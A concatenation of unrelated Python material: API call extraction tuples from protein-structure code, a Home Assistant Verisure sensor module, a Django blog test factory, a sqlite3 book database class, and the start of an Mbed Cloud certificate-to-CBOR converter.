torch\n'), ((17981, 18047), 'torch.zeros', 'torch.zeros', (['seqs.shape[0]', '(seqs.shape[1] * 14)', '(seqs.shape[1] * 14)'], {}), '(seqs.shape[0], seqs.shape[1] * 14, seqs.shape[1] * 14)\n', (17992, 18047), False, 'import torch\n'), ((18112, 18142), 'torch.zeros', 'torch.zeros', (['seqs.shape[1]', '(14)'], {}), '(seqs.shape[1], 14)\n', (18123, 18142), False, 'import torch\n'), ((20086, 20113), 'torch.cross', 'torch.cross', (['ba', 'cb'], {'dim': '(-1)'}), '(ba, cb, dim=-1)\n', (20097, 20113), False, 'import torch\n'), ((20129, 20161), 'torch.cross', 'torch.cross', (['n_plane', 'cb'], {'dim': '(-1)'}), '(n_plane, cb, dim=-1)\n', (20140, 20161), False, 'import torch\n'), ((20177, 20221), 'torch.stack', 'torch.stack', (['[cb, n_plane_, n_plane]'], {'dim': '(-1)'}), '([cb, n_plane_, n_plane], dim=-1)\n', (20188, 20221), False, 'import torch\n'), ((20237, 20277), 'torch.norm', 'torch.norm', (['rotate'], {'dim': '(-2)', 'keepdim': '(True)'}), '(rotate, dim=-2, keepdim=True)\n', (20247, 20277), False, 'import torch\n'), ((21850, 21910), 'einops.rearrange', 'rearrange', (['backbones', '"""b (l back) d -> b l back d"""'], {'l': 'length'}), "(backbones, 'b (l back) d -> b l back d', l=length)\n", (21859, 21910), False, 'from einops import rearrange, repeat\n'), ((25278, 25298), 'numpy.arange', 'np.arange', (['shape[-2]'], {}), '(shape[-2])\n', (25287, 25298), True, 'import numpy as np\n'), ((26661, 26673), 'numpy.arange', 'np.arange', (['N'], {}), '(N)\n', (26670, 26673), True, 'import numpy as np\n'), ((27228, 27272), 'torch.stack', 'torch.stack', (['[svd[0] for svd in svds]'], {'dim': '(0)'}), '([svd[0] for svd in svds], dim=0)\n', (27239, 27272), False, 'import torch\n'), ((27281, 27325), 'torch.stack', 'torch.stack', (['[svd[1] for svd in svds]'], {'dim': '(0)'}), '([svd[1] for svd in svds], dim=0)\n', (27292, 27325), False, 'import torch\n'), ((27334, 27378), 'torch.stack', 'torch.stack', (['[svd[2] for svd in svds]'], {'dim': '(0)'}), '([svd[2] for svd in svds], dim=0)\n', (27345, 27378), False, 'import torch\n'), ((35352, 35388), 'numpy.transpose', 'np.transpose', (['pred_coords', '(0, 2, 1)'], {}), '(pred_coords, (0, 2, 1))\n', (35364, 35388), True, 'import numpy as np\n'), ((37677, 37693), 'numpy.linalg.svd', 'np.linalg.svd', (['C'], {}), '(C)\n', (37690, 37693), True, 'import numpy as np\n'), ((37910, 37922), 'numpy.dot', 'np.dot', (['V', 'W'], {}), '(V, W)\n', (37916, 37922), True, 'import numpy as np\n'), ((1983, 1992), 'functools.wraps', 'wraps', (['fn'], {}), '(fn)\n', (1988, 1992), False, 'from functools import wraps\n'), ((2428, 2437), 'functools.wraps', 'wraps', (['fn'], {}), '(fn)\n', (2433, 2437), False, 'from functools import wraps\n'), ((10236, 10251), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (10249, 10251), False, 'import torch\n'), ((11355, 11370), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (11368, 11370), False, 'import torch\n'), ((15144, 15165), 'torch.nonzero', 'torch.nonzero', (['N_mask'], {}), '(N_mask)\n', (15157, 15165), False, 'import torch\n'), ((15167, 15189), 'torch.nonzero', 'torch.nonzero', (['CA_mask'], {}), '(CA_mask)\n', (15180, 15189), False, 'import torch\n'), ((15191, 15212), 'torch.nonzero', 'torch.nonzero', (['C_mask'], {}), '(C_mask)\n', (15204, 15212), False, 'import torch\n'), ((22099, 22156), 'einops.repeat', 'repeat', (['predicted[:, :, -1]', '"""b l d -> b l scn d"""'], {'scn': '(10)'}), "(predicted[:, :, -1], 'b l d -> b l scn d', scn=10)\n", (22105, 22156), False, 'from einops import rearrange, repeat\n'), ((22198, 22255), 'einops.repeat', 'repeat', (['new_coords[:, :, 1]', '"""b l d -> b l scn d"""'], {'scn': '(10)'}), "(new_coords[:, :, 1], 'b l d -> b l scn d', scn=10)\n", (22204, 22255), False, 'from einops import rearrange, repeat\n'), ((24782, 24813), 'torch.cumsum', 'torch.cumsum', (['distogram'], {'dim': '(-1)'}), '(distogram, dim=-1)\n', (24794, 24813), False, 'import torch\n'), ((26685, 26730), 'torch.tensor', 'torch.tensor', (['([np.inf] * batch)'], {'device': 'device'}), '([np.inf] * batch, device=device)\n', (26697, 26730), False, 'import torch\n'), ((27185, 27206), 'torch.svd_lowrank', 'torch.svd_lowrank', (['mi'], {}), '(mi)\n', (27202, 27206), False, 'import torch\n'), ((27841, 27870), 'torch.ones_like', 'torch.ones_like', (['pre_dist_mat'], {}), '(pre_dist_mat)\n', (27856, 27870), False, 'import torch\n'), ((28527, 28559), 'torch.norm', 'torch.norm', (['coords'], {'dim': '(-1, -2)'}), '(coords, dim=(-1, -2))\n', (28537, 28559), False, 'import torch\n'), ((29029, 29068), 'torch.transpose', 'torch.transpose', (['best_3d_coords', '(-1)', '(-2)'], {}), '(best_3d_coords, -1, -2)\n', (29044, 29068), False, 'import torch\n'), ((29069, 29092), 'torch.stack', 'torch.stack', (['his'], {'dim': '(0)'}), '(his, dim=0)\n', (29080, 29092), False, 'import torch\n'), ((29433, 29459), 'numpy.ones_like', 'np.ones_like', (['pre_dist_mat'], {}), '(pre_dist_mat)\n', (29445, 29459), True, 'import numpy as np\n'), ((29696, 29710), 'numpy.ones', 'np.ones', (['batch'], {}), '(batch)\n', (29703, 29710), True, 'import numpy as np\n'), ((29892, 29983), 'numpy.linalg.norm', 'np.linalg.norm', (['(best_3d_coords[:, :, :, None] - best_3d_coords[:, :, None, :])'], {'axis': '(-3)'}), '(best_3d_coords[:, :, :, None] - best_3d_coords[:, :, None, :\n ], axis=-3)\n', (29906, 29983), True, 'import numpy as np\n'), ((30441, 30478), 'numpy.linalg.norm', 'np.linalg.norm', (['coords'], {'axis': '(-1, -2)'}), '(coords, axis=(-1, -2))\n', (30455, 30478), True, 'import numpy as np\n'), ((30999, 31012), 'numpy.array', 'np.array', (['his'], {}), '(his)\n', (31007, 31012), True, 'import numpy as np\n'), ((36822, 36834), 'torch.svd', 'torch.svd', (['C'], {}), '(C)\n', (36831, 36834), False, 'import torch\n'), ((36882, 36901), 'torch.linalg.svd', 'torch.linalg.svd', (['C'], {}), '(C)\n', (36898, 36901), False, 'import torch\n'), ((37958, 37973), 'numpy.dot', 'np.dot', (['X_.T', 'U'], {}), '(X_.T, U)\n', (37964, 37973), True, 'import numpy as np\n'), ((39258, 39280), 'torch.cdist', 'torch.cdist', (['X', 'X'], {'p': 'p'}), '(X, X, p=p)\n', (39269, 39280), False, 'import torch\n'), ((39320, 39342), 'torch.cdist', 'torch.cdist', (['Y', 'Y'], {'p': 'p'}), '(Y, Y, p=p)\n', (39331, 39342), False, 'import torch\n'), ((39855, 39894), 'torch.mean', 'torch.mean', (['((X - Y) ** 2)'], {'axis': '(-1, -2)'}), '((X - Y) ** 2, axis=(-1, -2))\n', (39865, 39894), False, 'import torch\n'), ((40007, 40043), 'numpy.mean', 'np.mean', (['((X - Y) ** 2)'], {'axis': '(-1, -2)'}), '((X - Y) ** 2, axis=(-1, -2))\n', (40014, 40043), True, 'import numpy as np\n'), ((41076, 41095), 'numpy.array', 'np.array', (['[weights]'], {}), '([weights])\n', (41084, 41095), True, 'import numpy as np\n'), ((45207, 45253), 'torch.cdist', 'torch.cdist', (['selected_pred', 'selected_pred'], {'p': '(2)'}), '(selected_pred, selected_pred, p=2)\n', (45218, 45253), False, 'import torch\n'), ((45280, 45330), 'torch.cdist', 'torch.cdist', (['selected_target', 'selected_target'], {'p': '(2)'}), '(selected_target, selected_target, p=2)\n', (45291, 45330), False, 'import torch\n'), ((14744, 14777), 'torch.zeros', 'torch.zeros', (['*scn_seq.shape', 'n_aa'], {}), '(*scn_seq.shape, n_aa)\n', (14755, 14777), False, 'import torch\n'), ((17077, 17103), 'torch.zeros_like', 'torch.zeros_like', (['attr_mat'], {}), '(attr_mat)\n', (17093, 17103), False, 'import torch\n'), ((18174, 18194), 'torch.nonzero', 'torch.nonzero', (['scaff'], {}), '(scaff)\n', (18187, 18194), False, 'import torch\n'), ((21772, 21821), 'torch.zeros', 'torch.zeros', (['batch', 'length', 'NUM_COORDS_PER_RES', '(3)'], {}), '(batch, length, NUM_COORDS_PER_RES, 3)\n', (21783, 21821), False, 'import torch\n'), ((22306, 22335), 'torch.logical_not', 'torch.logical_not', (['cloud_mask'], {}), '(cloud_mask)\n', (22323, 22335), False, 'import torch\n'), ((24951, 24986), 'torch.min', 'torch.min', (['central', 'max_bin_allowed'], {}), '(central, max_bin_allowed)\n', (24960, 24986), False, 'import torch\n'), ((25707, 25747), 'torch.zeros_like', 'torch.zeros_like', (['central'], {'device': 'device'}), '(central, device=device)\n', (25723, 25747), False, 'import torch\n'), ((27552, 27591), 'torch.transpose', 'torch.transpose', (['best_3d_coords', '(-1)', '(-2)'], {}), '(best_3d_coords, -1, -2)\n', (27567, 27591), False, 'import torch\n'), ((28480, 28511), 'torch.matmul', 'torch.matmul', (['B', 'best_3d_coords'], {}), '(B, best_3d_coords)\n', (28492, 28511), False, 'import torch\n'), ((29734, 29761), 'numpy.random.rand', 'np.random.rand', (['batch', '(3)', 'N'], {}), '(batch, 3, N)\n', (29748, 29761), True, 'import numpy as np\n'), ((30397, 30425), 'numpy.matmul', 'np.matmul', (['best_3d_coords', 'B'], {}), '(best_3d_coords, B)\n', (30406, 30425), True, 'import numpy as np\n'), ((33718, 33751), 'torch.logical_or', 'torch.logical_or', (['N_mask', 'CA_mask'], {}), '(N_mask, CA_mask)\n', (33734, 33751), False, 'import torch\n'), ((36964, 36976), 'torch.det', 'torch.det', (['V'], {}), '(V)\n', (36973, 36976), False, 'import torch\n'), ((36979, 36991), 'torch.det', 'torch.det', (['W'], {}), '(W)\n', (36988, 36991), False, 'import torch\n'), ((37115, 37133), 'torch.matmul', 'torch.matmul', (['V', 'W'], {}), '(V, W)\n', (37127, 37133), False, 'import torch\n'), ((37751, 37767), 'numpy.linalg.det', 'np.linalg.det', (['V'], {}), '(V)\n', (37764, 37767), True, 'import numpy as np\n'), ((37770, 37786), 'numpy.linalg.det', 'np.linalg.det', (['W'], {}), '(W)\n', (37783, 37786), True, 'import numpy as np\n'), ((41535, 41550), 'numpy.cbrt', 'np.cbrt', (['(L - 15)'], {}), '(L - 15)\n', (41542, 41550), True, 'import numpy as np\n'), ((41839, 41854), 'numpy.cbrt', 'np.cbrt', (['(L - 15)'], {}), '(L - 15)\n', (41846, 41854), True, 'import numpy as np\n'), ((42691, 42722), 'torch.nonzero', 'torch.nonzero', (['(phi_ratios < 0.5)'], {}), '(phi_ratios < 0.5)\n', (42704, 42722), False, 'import torch\n'), ((44511, 44554), 'torch.tensor', 'torch.tensor', (['[0.5, 1, 2, 4]'], {'device': 'device'}), '([0.5, 1, 2, 4], device=device)\n', (44523, 44554), False, 'import torch\n'), ((44646, 44694), 'torch.zeros', 'torch.zeros', (['cloud_mask.shape[1:]'], {'device': 'device'}), '(cloud_mask.shape[1:], device=device)\n', (44657, 44694), False, 'import torch\n'), ((44822, 44871), 'torch.zeros', 'torch.zeros', (['true_coords.shape[:2]'], {'device': 'device'}), '(true_coords.shape[:2], device=device)\n', (44833, 44871), False, 'import torch\n'), ((45404, 45446), 'torch.abs', 'torch.abs', (['(dist_mat_pred - dist_mat_target)'], {}), '(dist_mat_pred - dist_mat_target)\n', (45413, 45446), False, 'import torch\n'), ((8614, 8644), 'Bio.SeqIO.parse', 'SeqIO.parse', (['filename', '"""fasta"""'], {}), "(filename, 'fasta')\n", (8625, 8644), False, 'from Bio import SeqIO\n'), ((24877, 24913), 'torch.searchsorted', 'torch.searchsorted', (['cum_dist', 'medium'], {}), '(cum_dist, medium)\n', (24895, 24913), False, 'import torch\n'), ((27611, 27634), 'torch.stack', 'torch.stack', (['his'], {'dim': '(0)'}), '(his, dim=0)\n', (27622, 27634), False, 'import torch\n'), ((28051, 28099), 'torch.cdist', 'torch.cdist', (['best_3d_coords', 'best_3d_coords'], {'p': '(2)'}), '(best_3d_coords, best_3d_coords, p=2)\n', (28062, 28099), False, 'import torch\n'), ((30264, 30276), 'numpy.arange', 'np.arange', (['N'], {}), '(N)\n', (30273, 30276), True, 'import numpy as np\n'), ((30278, 30290), 'numpy.arange', 'np.arange', (['N'], {}), '(N)\n', (30287, 30290), True, 'import numpy as np\n'), ((36709, 36737), 'torch.__version__.split', 'torch.__version__.split', (['"""."""'], {}), "('.')\n", (36732, 36737), False, 'import torch\n'), ((39395, 39417), 'torch.ones_like', 'torch.ones_like', (['Y_mat'], {}), '(Y_mat)\n', (39410, 39417), False, 'import torch\n'), ((40391, 40414), 'torch.tensor', 'torch.tensor', (['[weights]'], {}), '([weights])\n', (40403, 40414), False, 'import torch\n'), ((45519, 45552), 'torch.zeros_like', 'torch.zeros_like', (['under_r0_target'], {}), '(under_r0_target)\n', (45535, 45552), False, 'import torch\n'), ((45581, 45614), 'torch.zeros_like', 'torch.zeros_like', (['under_r0_target'], {}), '(under_r0_target)\n', (45597, 45614), False, 'import torch\n'), ((20555, 20578), 'torch.matmul', 'torch.matmul', (['rotate', 'd'], {}), '(rotate, d)\n', (20567, 20578), False, 'import torch\n'), ((24590, 24623), 'torch.tensor', 'torch.tensor', (['(n_bins.shape[0] - 1)'], {}), '(n_bins.shape[0] - 1)\n', (24602, 24623), False, 'import torch\n'), ((27413, 27432), 'torch.diag_embed', 'torch.diag_embed', (['s'], {}), '(s)\n', (27429, 27432), False, 'import torch\n'), ((31545, 31572), 'torch.cross', 'torch.cross', (['u2', 'u3'], {'dim': '(-1)'}), '(u2, u3, dim=-1)\n', (31556, 31572), False, 'import torch\n'), ((31617, 31644), 'torch.cross', 'torch.cross', (['u1', 'u2'], {'dim': '(-1)'}), '(u1, u2, dim=-1)\n', (31628, 31644), False, 'import torch\n'), ((31646, 31673), 'torch.cross', 'torch.cross', (['u2', 'u3'], {'dim': '(-1)'}), '(u2, u3, dim=-1)\n', (31657, 31673), False, 'import torch\n'), ((32176, 32201), 'numpy.cross', 'np.cross', (['u2', 'u3'], {'axis': '(-1)'}), '(u2, u3, axis=-1)\n', (32184, 32201), True, 'import numpy as np\n'), ((32243, 32268), 'numpy.cross', 'np.cross', (['u1', 'u2'], {'axis': '(-1)'}), '(u1, u2, axis=-1)\n', (32251, 32268), True, 'import numpy as np\n'), ((32270, 32295), 'numpy.cross', 'np.cross', (['u2', 'u3'], {'axis': '(-1)'}), '(u2, u3, axis=-1)\n', (32278, 32295), True, 'import numpy as np\n'), ((45797, 45850), 'torch.bucketize', 'torch.bucketize', (['compare_dists'], {'boundaries': 'thresholds'}), '(compare_dists, boundaries=thresholds)\n', (45812, 45850), False, 'import torch\n'), ((13530, 13581), 'einops.rearrange', 'rearrange', (['coords', '"""... (l c) d -> ... l c d"""'], {'c': '(14)'}), "(coords, '... (l c) d -> ... l c d', c=14)\n", (13539, 13581), False, 'from einops import rearrange, repeat\n'), ((20331, 20347), 'torch.cos', 'torch.cos', (['theta'], {}), '(theta)\n', (20340, 20347), False, 'import torch\n'), ((20371, 20387), 'torch.sin', 'torch.sin', (['theta'], {}), '(theta)\n', (20380, 20387), False, 'import torch\n'), ((20390, 20404), 'torch.cos', 'torch.cos', (['chi'], {}), '(chi)\n', (20399, 20404), False, 'import torch\n'), ((20428, 20444), 'torch.sin', 'torch.sin', (['theta'], {}), '(theta)\n', (20437, 20444), False, 'import torch\n'), ((20447, 20461), 'torch.sin', 'torch.sin', (['chi'], {}), '(chi)\n', (20456, 20461), False, 'import torch\n'), ((23051, 23097), 'torch.tensor', 'torch.tensor', (["BB_BUILD_INFO['BONDLENS']['c-o']"], {}), "(BB_BUILD_INFO['BONDLENS']['c-o'])\n", (23063, 23097), False, 'import torch\n'), ((23166, 23215), 'torch.tensor', 'torch.tensor', (["BB_BUILD_INFO['BONDANGS']['ca-c-o']"], {}), "(BB_BUILD_INFO['BONDANGS']['ca-c-o'])\n", (23178, 23215), False, 'import torch\n'), ((23284, 23304), 'torch.tensor', 'torch.tensor', (['(-np.pi)'], {}), '(-np.pi)\n', (23296, 23304), False, 'import torch\n'), ((31500, 31536), 'torch.norm', 'torch.norm', (['u2'], {'dim': '(-1)', 'keepdim': '(True)'}), '(u2, dim=-1, keepdim=True)\n', (31510, 31536), False, 'import torch\n'), ((32125, 32167), 'numpy.linalg.norm', 'np.linalg.norm', (['u2'], {'axis': '(-1)', 'keepdims': '(True)'}), '(u2, axis=-1, keepdims=True)\n', (32139, 32167), True, 'import numpy as np\n'), ((35643, 35663), 'numpy.ones_like', 'np.ones_like', (['N_mask'], {}), '(N_mask)\n', (35655, 35663), True, 'import numpy as np\n')] |
"""
Interfaces with Verisure sensors.
For more details about this platform, please refer to the documentation at
documentation at https://home-assistant.io/components/verisure/
"""
import logging
from homeassistant.components.verisure import HUB as hub
from homeassistant.const import TEMP_CELSIUS
from homeassistant.helpers.entity import Entity
_LOGGER = logging.getLogger(__name__)
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Setup the Verisure platform."""
sensors = []
if int(hub.config.get('thermometers', '1')):
hub.update_climate()
sensors.extend([
VerisureThermometer(value.id)
for value in hub.climate_status.values()
if hasattr(value, 'temperature') and value.temperature
])
if int(hub.config.get('hygrometers', '1')):
hub.update_climate()
sensors.extend([
VerisureHygrometer(value.id)
for value in hub.climate_status.values()
if hasattr(value, 'humidity') and value.humidity
])
if int(hub.config.get('mouse', '1')):
hub.update_mousedetection()
sensors.extend([
VerisureMouseDetection(value.deviceLabel)
for value in hub.mouse_status.values()
# is this if needed?
if hasattr(value, 'amountText') and value.amountText
])
add_devices(sensors)
class VerisureThermometer(Entity):
"""Representation of a Verisure thermometer."""
def __init__(self, device_id):
"""Initialize the sensor."""
self._id = device_id
@property
def name(self):
"""Return the name of the device."""
return '{} {}'.format(
hub.climate_status[self._id].location,
"Temperature")
@property
def state(self):
"""Return the state of the device."""
# Remove ° character
return hub.climate_status[self._id].temperature[:-1]
@property
def available(self):
"""Return True if entity is available."""
return hub.available
@property
def unit_of_measurement(self):
"""Return the unit of measurement of this entity."""
return TEMP_CELSIUS
def update(self):
"""Update the sensor."""
hub.update_climate()
class VerisureHygrometer(Entity):
"""Representation of a Verisure hygrometer."""
def __init__(self, device_id):
"""Initialize the sensor."""
self._id = device_id
@property
def name(self):
"""Return the name of the sensor."""
return '{} {}'.format(
hub.climate_status[self._id].location,
"Humidity")
@property
def state(self):
"""Return the state of the sensor."""
# remove % character
return hub.climate_status[self._id].humidity[:-1]
@property
def available(self):
"""Return True if entity is available."""
return hub.available
@property
def unit_of_measurement(self):
"""Return the unit of measurement of this sensor."""
return "%"
def update(self):
"""Update the sensor."""
hub.update_climate()
class VerisureMouseDetection(Entity):
"""Representation of a Verisure mouse detector."""
def __init__(self, device_id):
"""Initialize the sensor."""
self._id = device_id
@property
def name(self):
"""Return the name of the sensor."""
return '{} {}'.format(
hub.mouse_status[self._id].location,
"Mouse")
@property
def state(self):
"""Return the state of the sensor."""
return hub.mouse_status[self._id].count
@property
def available(self):
"""Return True if entity is available."""
return hub.available
@property
def unit_of_measurement(self):
"""Return the unit of measurement of this sensor."""
return "Mice"
def update(self):
"""Update the sensor."""
hub.update_mousedetection()
| [
"logging.getLogger",
"homeassistant.components.verisure.HUB.climate_status.values",
"homeassistant.components.verisure.HUB.mouse_status.values",
"homeassistant.components.verisure.HUB.config.get",
"homeassistant.components.verisure.HUB.update_climate",
"homeassistant.components.verisure.HUB.update_mousede... | [((359, 386), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (376, 386), False, 'import logging\n'), ((525, 560), 'homeassistant.components.verisure.HUB.config.get', 'hub.config.get', (['"""thermometers"""', '"""1"""'], {}), "('thermometers', '1')\n", (539, 560), True, 'from homeassistant.components.verisure import HUB as hub\n'), ((571, 591), 'homeassistant.components.verisure.HUB.update_climate', 'hub.update_climate', ([], {}), '()\n', (589, 591), True, 'from homeassistant.components.verisure import HUB as hub\n'), ((806, 840), 'homeassistant.components.verisure.HUB.config.get', 'hub.config.get', (['"""hygrometers"""', '"""1"""'], {}), "('hygrometers', '1')\n", (820, 840), True, 'from homeassistant.components.verisure import HUB as hub\n'), ((851, 871), 'homeassistant.components.verisure.HUB.update_climate', 'hub.update_climate', ([], {}), '()\n', (869, 871), True, 'from homeassistant.components.verisure import HUB as hub\n'), ((1079, 1107), 'homeassistant.components.verisure.HUB.config.get', 'hub.config.get', (['"""mouse"""', '"""1"""'], {}), "('mouse', '1')\n", (1093, 1107), True, 'from homeassistant.components.verisure import HUB as hub\n'), ((1118, 1145), 'homeassistant.components.verisure.HUB.update_mousedetection', 'hub.update_mousedetection', ([], {}), '()\n', (1143, 1145), True, 'from homeassistant.components.verisure import HUB as hub\n'), ((2289, 2309), 'homeassistant.components.verisure.HUB.update_climate', 'hub.update_climate', ([], {}), '()\n', (2307, 2309), True, 'from homeassistant.components.verisure import HUB as hub\n'), ((3167, 3187), 'homeassistant.components.verisure.HUB.update_climate', 'hub.update_climate', ([], {}), '()\n', (3185, 3187), True, 'from homeassistant.components.verisure import HUB as hub\n'), ((4012, 4039), 'homeassistant.components.verisure.HUB.update_mousedetection', 'hub.update_mousedetection', ([], {}), '()\n', (4037, 4039), True, 'from homeassistant.components.verisure import HUB as hub\n'), ((684, 711), 'homeassistant.components.verisure.HUB.climate_status.values', 'hub.climate_status.values', ([], {}), '()\n', (709, 711), True, 'from homeassistant.components.verisure import HUB as hub\n'), ((963, 990), 'homeassistant.components.verisure.HUB.climate_status.values', 'hub.climate_status.values', ([], {}), '()\n', (988, 990), True, 'from homeassistant.components.verisure import HUB as hub\n'), ((1250, 1275), 'homeassistant.components.verisure.HUB.mouse_status.values', 'hub.mouse_status.values', ([], {}), '()\n', (1273, 1275), True, 'from homeassistant.components.verisure import HUB as hub\n')] |
import factory
from factory.django import DjangoModelFactory as Factory
from django.contrib.auth.models import Permission
from ..models import Blog
from articles.users.tests.factories import UserFactory
class Blogfactory(Factory):
user = user = factory.SubFactory(UserFactory)
title = factory.Faker('sentence', nb_words=3)
description = factory.Faker('paragraph', nb_sentences=5)
content = factory.Faker('paragraph', nb_sentences=10)
gdoc_link = 'https://docs.google.com/document/d/1NcF8_6ZMraTXp7H7DVzR6pbqzJgNIyg3gYLUUoFoYe8/edit'
status = factory.Faker('random_element', elements=[sttaus[0] for sttaus in Blog.STATUS_CHOICES])
class Meta:
model = Blog
def create_user_writer_with_permission():
user = UserFactory()
write_blogs_perm = Permission.objects.filter(codename='can_write_blogs').first()
user.user_permissions.add(write_blogs_perm)
return user
def create_editor_user_with_permission():
user = UserFactory()
review_blogs_perm = Permission.objects.filter(codename='can_review_blogs').first()
user.user_permissions.add(review_blogs_perm)
return user
| [
"factory.SubFactory",
"factory.Faker",
"django.contrib.auth.models.Permission.objects.filter",
"articles.users.tests.factories.UserFactory"
] | [((253, 284), 'factory.SubFactory', 'factory.SubFactory', (['UserFactory'], {}), '(UserFactory)\n', (271, 284), False, 'import factory\n'), ((297, 334), 'factory.Faker', 'factory.Faker', (['"""sentence"""'], {'nb_words': '(3)'}), "('sentence', nb_words=3)\n", (310, 334), False, 'import factory\n'), ((353, 395), 'factory.Faker', 'factory.Faker', (['"""paragraph"""'], {'nb_sentences': '(5)'}), "('paragraph', nb_sentences=5)\n", (366, 395), False, 'import factory\n'), ((410, 453), 'factory.Faker', 'factory.Faker', (['"""paragraph"""'], {'nb_sentences': '(10)'}), "('paragraph', nb_sentences=10)\n", (423, 453), False, 'import factory\n'), ((570, 662), 'factory.Faker', 'factory.Faker', (['"""random_element"""'], {'elements': '[sttaus[0] for sttaus in Blog.STATUS_CHOICES]'}), "('random_element', elements=[sttaus[0] for sttaus in Blog.\n STATUS_CHOICES])\n", (583, 662), False, 'import factory\n'), ((751, 764), 'articles.users.tests.factories.UserFactory', 'UserFactory', ([], {}), '()\n', (762, 764), False, 'from articles.users.tests.factories import UserFactory\n'), ((969, 982), 'articles.users.tests.factories.UserFactory', 'UserFactory', ([], {}), '()\n', (980, 982), False, 'from articles.users.tests.factories import UserFactory\n'), ((788, 841), 'django.contrib.auth.models.Permission.objects.filter', 'Permission.objects.filter', ([], {'codename': '"""can_write_blogs"""'}), "(codename='can_write_blogs')\n", (813, 841), False, 'from django.contrib.auth.models import Permission\n'), ((1007, 1061), 'django.contrib.auth.models.Permission.objects.filter', 'Permission.objects.filter', ([], {'codename': '"""can_review_blogs"""'}), "(codename='can_review_blogs')\n", (1032, 1061), False, 'from django.contrib.auth.models import Permission\n')] |
import sqlite3
class Database:
# create book always if not exists
def __init__(self,db):
self.conn = sqlite3.connect(db)
self.cur = self.conn.execute("CREATE TABLE IF NOT EXISTS book (id INTEGER PRIMARY KEY, " +
"title TEXT, author TEXT, year INTEGER, isbn INTEGER)")
self.conn.commit()
def insert(self,title,author,year,isbn):
self.cur.execute("INSERT INTO book VALUES (NULL,?,?,?,?)",(title,author,year,isbn))
self.conn.commit()
def view(self):
self.cur.execute("SELECT * FROM book")
rows = self.cur.fetchall()
return rows
def search(self,title="",author="",year="",isbn=""):
self.cur.execute("SELECT * FROM book WHERE title=? OR author=? " +
"OR year=? OR isbn=?",(title,author,year,isbn))
rows = self.cur.fetchall()
return rows
def delete(self,id):
self.cur.execute("DELETE FROM book WHERE id=?",(id,))
self.conn.commit()
def update(self,id,title,author,year,isbn):
self.cur.execute("UPDATE book SET title=?, author=?, " +
"year=?,isbn=? WHERE id=?", (title,author,year,isbn,id))
self.conn.commit()
def __del__(self):
self.conn.close() | [
"sqlite3.connect"
] | [((119, 138), 'sqlite3.connect', 'sqlite3.connect', (['db'], {}), '(db)\n', (134, 138), False, 'import sqlite3\n')] |
#!/usr/bin/env python
# ----------------------------------------------------------------------------
# Copyright 2018 ARM Ltd.
#
# SPDX-License-Identifier: Apache-2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ----------------------------------------------------------------------------
import os
import cbor2
import struct
from pyclibrary import CParser
from collections import namedtuple
CERTIFICATE_KEYS = ('MBED_CLOUD_DEV_BOOTSTRAP_DEVICE_CERTIFICATE',
'MBED_CLOUD_DEV_BOOTSTRAP_SERVER_ROOT_CA_CERTIFICATE',
'arm_uc_default_certificate')
KEY_KEYS = ('MBED_CLOUD_DEV_BOOTSTRAP_DEVICE_PRIVATE_KEY')
UPDATE_KEYS = ('arm_uc_default_certificate',
'arm_uc_class_id',
'arm_uc_vendor_id')
KEY_MAP = {
'MBED_CLOUD_DEV_BOOTSTRAP_DEVICE_CERTIFICATE': 'mbed.BootstrapDeviceCert',
'MBED_CLOUD_DEV_BOOTSTRAP_SERVER_ROOT_CA_CERTIFICATE': 'mbed.BootstrapServerCACert',
'MBED_CLOUD_DEV_BOOTSTRAP_DEVICE_PRIVATE_KEY': 'mbed.BootstrapDevicePrivateKey',
'MBED_CLOUD_DEV_BOOTSTRAP_ENDPOINT_NAME': 'mbed.EndpointName',
'MBED_CLOUD_DEV_BOOTSTRAP_SERVER_URI': 'mbed.BootstrapServerURI',
'MBED_CLOUD_DEV_ACCOUNT_ID': 'mbed.AccountID',
'MBED_CLOUD_DEV_MANUFACTURER': 'mbed.Manufacturer',
'MBED_CLOUD_DEV_MODEL_NUMBER': 'mbed.ModelNumber',
'MBED_CLOUD_DEV_SERIAL_NUMBER': 'mbed.SerialNumber',
'MBED_CLOUD_DEV_DEVICE_TYPE': 'mbed.DeviceType',
'MBED_CLOUD_DEV_HARDWARE_VERSION': 'mbed.HardwareVersion',
'MBED_CLOUD_DEV_MEMORY_TOTAL_KB': 'mbed.MemoryTotalKB',
'arm_uc_default_certificate': 'mbed.UpdateAuthCert',
'arm_uc_class_id': 'mbed.ClassId',
'arm_uc_vendor_id': 'mbed.VendorId'
}
ConfigParam = namedtuple('ConfigParam', ['Data', 'Name'])
Certificate = namedtuple('Certificate', ['Data', 'Format', 'Name'])
Key = namedtuple('Key', ['Data', 'Format', 'Name', 'Type'])
class CBORConverter():
def __init__(self, development_certificate, update_resource, cbor_file):
self.development_certificate = development_certificate
self.update_resource = update_resource
self.cbor_file = cbor_file
def __check_file_exists(self, path):
if not os.path.isfile(path):
print("File '%s' does not exist.")
return False
return True
def parse_c_file(self):
if not self.__check_file_exists(self.development_certificate) or \
not self.__check_file_exists(self.update_resource):
return None
values = {}
values.update(CParser([self.development_certificate]).defs.get('values'))
values.update(CParser([self.update_resource],
macros={
'MBED_CLOUD_DEV_UPDATE_ID' : 1,
'MBED_CLOUD_DEV_UPDATE_CERT' : 1
}).defs.get('values'))
return values
def create_cbor_data(self, vars):
cbor_data = {'Certificates': [],
'Keys' : [],
'ConfigParams': [],
'SchemeVersion': '0.0.1'}
use_bootstrap = 1 if 'MBED_CLOUD_DEV_BOOTSTRAP_SERVER_URI' in vars.keys() else 0
cbor_data['ConfigParams'].append(ConfigParam(use_bootstrap, 'mbed.UseBootstrap')._asdict())
for key in vars.keys():
var = vars.get(key)
cbor_var_key = KEY_MAP.get(key, None)
if cbor_var_key:
if key in CERTIFICATE_KEYS:
byte_data = struct.pack('%sB' % len(var), *var);
certificate = Certificate(byte_data, 'der', cbor_var_key)._asdict()
cbor_data['Certificates'].append(certificate)
elif key in KEY_KEYS:
byte_data = struct.pack('%sB' % len(var), *var);
